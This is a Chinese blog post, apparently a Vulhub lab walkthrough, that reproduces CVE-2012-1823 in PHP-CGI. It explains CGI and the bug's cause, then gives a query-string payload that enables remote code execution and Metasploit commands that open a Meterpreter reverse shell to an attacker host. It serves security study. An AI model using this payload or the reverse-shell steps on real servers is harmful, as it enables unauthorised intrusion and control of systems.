[Vulhub](CVE-2012-1823)PHP-CGI远程代码执行漏洞

最新推荐文章于 2023-02-12 14:35:46 发布
最新推荐文章于 2023-02-12 14:35:46 发布
阅读量1.1k 收藏 3
点赞数 2
分类专栏: 漏洞复现 文章标签: php 渗透测试 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45605352/article/details/115283390
版权

首先理解一下CGI的概念:

CGI

 CGI 全称是“公共网关接口”(Common Gateway Interface),HTTP
服务器与你的或其它机器上的程序进行“交谈”的一种工具,其程序须运行在网络服务器上。

 CGI 可以用任何一种语言编写,只要这种语言具有标准输入、输出和环境变量。如 PHP, Perl, Tcl 等。

CGI的作用

 CGI是一种根据请求信息动态产生回应内容的技术。

 通过CGI,Web服务器可以根据请求不同启动不同的外部程序,并将请求内容转发给该程序,在程序执行结束后,将执行结果作为回应返回给客户端

 绝大多数CGI程序被用来解释处理来自表单的输入信息,并在服务器产生相应的处理,或将相应的信息反馈给服务器。CGI程序使网页具有交互功能

CGI处理步骤
  1. 通过Internet把用户请求送到服务器
  2. 服务器接收用户请求并交给CGI程序处理
  3. CGI程序把处理结果传送给服务器
  4. 服务器把结果送回用户
FastCGI

 进程的创建和调度都是有一定小号的,而且进程的数量也不是无限的,基于CGI模式运行的网站通常不能同时接受大量请求,否则每个请求生成一个子进程就可能把服务器挤爆。于是FastCGI在CGI的基础上做了优化,更像是一个常驻型的CGI,它可以一致执行着,只要激活以后就不需要每次都花费时间fork一次

更多资料参考CGI概念CGI/FastCGI/PHP-CGI/PHP-FPM 概念理解

PHP SAPI 与运行模式

 php-cgi也是一个sapi。在远古的时候,web应用的运行方式很简单,web容器接收到http数据包后,拿到用户请求的文件(cgi脚本),并fork出一个子进程(解释器)去执行这个文件,然后拿到执行结果,直接返回给用户,同时这个解释器子进程也就结束了。基于bash、perl等语言的web应用多半都是以这种方式来执行,这种执行方式一般就被称为cgi,在安装Apache的时候默认有一个cgi-bin目录,最早就是放置这些cgi脚本用的。

 php-cgi有两个功能,一是提供cgi方式的交互,二是提供fastcgi方式的交互。也就说,我们可以像perl一样,让web容器直接fork一个php-cgi进程执行某脚本;也可以在后台运行php-cgi -b 127.0.0.1:9000(php-cgi作为fastcgi的管理器),并让web容器用fastcgi协议和9000交互。

漏洞成因

 CVE-2012-1823就是php-cgi这个sapi出现的漏洞,本漏洞只出现在cgi模式运行的php中。影响范围 php < 5.3.12 或 php < 5.4.2

 这个漏洞简单来说,就是用户请求的querystring被作为了php-cgi的参数,最终导致了一系列结果。

 探究一下原理,RFC3875中规定,当querystring中不包含没有解码的=号的情况下,要将querystring作为cgi的参数传入。所以,Apache服务器按要求实现了这个功能。但PHP并没有注意到RFC的这一个规则,也许是曾经注意并处理了,处理方法就是web上下文中不允许传入参数。

 于是就导致了php不光可以通过命令行参数的方式传入php-cgi,也可以通过querystring的方式传入。

环境搭建(ubuntu中部署vulhuub环境)

1.安装docker,并用docker -v命令验证(这里已经安装好就不在演示):

curl -s https://get.docker.com/ | sh  
或者  
sudo apt install docker.io

在这里插入图片描述
2. 安装python-pip,并用pip -V命令验证:

​sudo apt-get install python-pip
或者
curl -s https://bootstrap.pypa.io/get-pip.py | python

在这里插入图片描述
3. 安装docker-compose,并用docker-compose -验证:

pip install docker-compose

在这里插入图片描述
4. 将vulhub解压至ubuntu一个路径下:/vulhub-master/ 也可以git下载

git clone https://github.com/vulhub/vulhub.git

在这里插入图片描述
5.启动环境

sudo docker-compose up

在这里插入图片描述
6. 可以查看正在运行的docker容器

docker ps

在这里插入图片描述 本地访问没问题,搭建成功:
在这里插入图片描述

漏洞复现

 1. 首先看看有哪些可用参数:

-c 指定php.ini文件的位置
-n 不要加载php.ini文件
-d 指定配置项
-b 启动fastcgi进程
-s 显示文件源码
-T 执行指定次该文件
-h和-? 显示帮助

 2. 最简单的利用方式当然是-s查看源码(参数仅在URL中才会被传递给cgi程序):
在这里插入图片描述
3.更高级的就是通过-d指定auto_prepend_file来制造任意文件包含漏洞,同时需要将allow_url_include设置为on,执行任意代码(注意空格用+代替,=用%3d代替)

  • php://input 可以读取http entity body中指定长度的值,由Content-Length指定长度,不管是POST方式或者GET方法提交过来的数据。但是,一般GET方法提交数据时,http request entity body部分都为空。
  • php://input 与$HTTP_RAW_POST_DATA读取的数据是一样的,都只读取Content-Type不为multipart/form-data的数据。
?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input

在这里插入图片描述

使用Metasploit反弹shell

search php_cgi
use exploit/multi/http/php_cgi_arg_injection
set rhosts 目标ip
set rport 8080
set payload php/meterpreter/reverse_tcp
set lhost 攻击ip

在这里插入图片描述
参考链接:
https://blog.csdn.net/qq_41901122/article/details/101110162(Ubuntu安装vulhub)
https://paper.seebug.org/297/(PHP-CGI远程代码执行漏洞(CVE-2012-1823)分析)
https://zhuanlan.zhihu.com/p/286302523(CGI概念)
https://jaminzhang.github.io/web/CGI-FastCGI-PHP-CGI-PHP-FPM-Concepts-Understanding/(CGI/FastCGI/PHP-CGI/PHP-FPM 概念理解)

yAnd0n9
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法的文件时,即被安装恶意程序。 该漏洞产生的根源在于对用户提供的数据缺乏适当的验证,这会引发分配的缓存背后的内存访问。漏洞利用需要用户交互,即攻击者需要访问恶意页面或打开精心伪造的RAR文件。但从实际攻击场景来说,欺骗用户执行必要的交互操作并不难。 RARLAB已于2023年8月2日发布了WinRAR v 6.23版本,建议用户尽快安装安全更新。 鉴于此类漏洞可被用于进一步攻击活动,微软已经开始测试Windows 11系统对RAR、7-Zip和GZ等压缩文件格式的支持,未来系统将无需安装WinRAR这样的第三方软件,以减少可能的攻击面。 CVE-2023-38831漏洞执行的Windows CMD脚本,来源:BleepingComputer 该漏洞是通过创建与安全文件相比结构略有修改的特制存档而触发的,这会导致 WinRAR 的 ShellExecu
PHP-CGI远程代码执行漏洞分析与防范
12-20
CVE-2012-1823出来时据说是“PHP远程代码执行漏洞”,曾经也“轰动一时”,当时的我只是刚踏入安全门的一个小菜,直到前段时间tomato师傅让我看一个案例,我才想起来这个漏洞。通过在 Vulhub 中对这个漏洞环境的搭建与漏洞原理的分析,我觉得还挺有意思的,故写出一篇文章来,和大家分享。 首先,介绍一下PHP的运行模式。 下载PHP源码,可以看到其中有个目录叫sapi。sapi在PHP中的作用,类似于一个消息的“传递者”,比如我在《 Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写 》一文中介绍的fpm,他的作用就是接受Web容器通过fastcgi协议封装
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
vulhub漏洞复现51_PHP
weixin_44193247的博客
02-11 844
vulhub漏洞复现练习篇
buuctf [PHP]inclusion
qq_1873822的博客
03-22 936
通过扫描发现phpinfo.php PHP LFI 学习参考: https://zhuanlan.zhihu.com/p/50445145 https://blog.csdn.net/qq_45521281/article/details/106498971?spm=1001.2014.3001.5501 https://blog.csdn.net/weixin_30847271/article/details/97824777 php版本7.2.25 说明该漏洞PHP版本无关。 …/…/…/…/…
php cgi 执行,php cgi远程任意代码执行漏洞
weixin_39520353的博客
03-10 95
国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了使用-s参数读取源文件的poc。另外关于RCE的PoC原文没有给...
vulhub靶场php环境下的CVE-2012-1823PHP-CGI远程代码执行漏洞
m0_73248913的博客
02-12 369
msf解决vulhub
PHP-CGI远程代码执行漏洞CVE-2012-1823
orchid_sea的博客
07-19 2539
在启动docker容器时,提示ServerName错误。将配置文件从容器中复制出来修改,再复制回去。将ServerName位置添加所需IP。检查一下是否修改成功。
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
最新发布
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在...
[Vulhub] Weblogic SSRF 漏洞CVE-2014-4210)
weixin_45605352的博客
07-21 4762
0x00 预备知识 01 SSRF概念: SSRF(服务端请求伪造),指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。 简单的说就是利用一个可发起网络请求的服务当作跳板来攻击其他服务 02 SSRF原理 SSRF的实质是利用存在缺陷的web应用作为代理攻击远程和本地的服务器。一般情况下, SSRF攻击的目标是外网无法访问的内部系统,黑客可以利用SSRF漏洞获取内部系统的一些信息(正是因为它是由服务端
[Vulhub] ActiveMQ漏洞
weixin_45605352的博客
01-10 3448
ActiveMQ 反序列化漏洞 (CVE-2015-5254) 0x00 漏洞描述 Apache ActiveMQ 是由美国 Pachitea(Apache)软件基金会开发的开源消息中间件,支持 Java 消息服务、集群、Spring 框架等。 Apache ActiveMQ 5.13.0 之前的 5.x 版本安全漏洞,该程序造成的漏洞不限制代理中可以序列化的类。远程攻击者可以制作一个特殊的序列化Java Message Service (JMS) ObjectMessage 对象,利用该漏洞执行任意代码
[Vulhub] Spring漏洞复现
weixin_45605352的博客
10-09 3140
Spring Security OAuth2 RCE(CVE-2016-4977) 0x00 漏洞描述 Spring Security OAuth 支持使用标准 Spring 和 Spring Security 编程模型和配置习惯用法与 OAuth (1a) 和 OAuth2 一起使用 Spring Security。 在使用白标签视图进行错误处理时,远程攻击者可以通过 Springs 表达式语言 (SpEL) 构造恶意参数来执行命令。 0x01 影响版本 2.0.0 - 2.0.9 1.0.0 - 1.
[Vulhub] PHP环境 XML外部实体注入漏洞(XXE)
weixin_45605352的博客
05-07 3022
0x01 预备知识 XXE是什么? XXE(XML External Entity Injection)也就是XML外部实体注入,XXE漏洞发生在应用程序解析XML输入时,XML文件的解析依赖libxml 库,而 libxml2.9 以前的版本默认支持并开启了对外部实体的引用,服务端解析用户提交的XML文件时,未对XML文件引用的外部实体(含外部一般实体和外部参数实体)做合适的处理,并且实体的URL支持 file:// 和 ftp:// 等协议,导致可加载恶意外部文件和代码,造成 任意文件读取、命令执行
PHP 远程代码执行漏洞(CVE-2022-31625)修复办法
07-14
针对PHP远程代码执行漏洞(CVE-2022-31625),以下是一些修复方法: 1. 更新到最新版本:确保你的PHP版本是最新的,因为漏洞修复通常会包含在更新中。请访问PHP官方网站或者使用包管理工具来获取最新版本。 2. 禁用危险函数:在php.ini配置文件中,禁用危险函数可以帮助防止远程代码执行。可以使用disable_functions指令来禁用一些敏感函数,如eval()、exec()、system()等。 3. 安全配置:检查你的PHP配置文件,确保安全设置已经启用。例如,禁用动态加载扩展、限制文件上传目录和大小、禁用远程文件包含等。 4. 输入验证和过滤:在你的应用程序中对用户输入进行严格的验证和过滤,以防止恶意代码注入。 5. 使用安全框架或库:使用安全框架或库来帮助防止远程代码执行漏洞。这些框架通常提供安全的默认配置和内置的安全功能。 6. 定期更新和监控:定期检查并更新你的应用程序和相关组件,以确保及时修复已知漏洞。同时,监控应用程序的日志和网络流量,以便及时发现异常行为。 请注意,这些方法只是一些常用的修复措施,具体的修复方法可能会因系统配置和应用程序的特定情况而有所不同。建议在修复漏洞之前,先进行充分的测试和备份。此外,如果你不确定如何处理或无法解决该漏洞,请咨询安全专家或PHP开发人员的帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值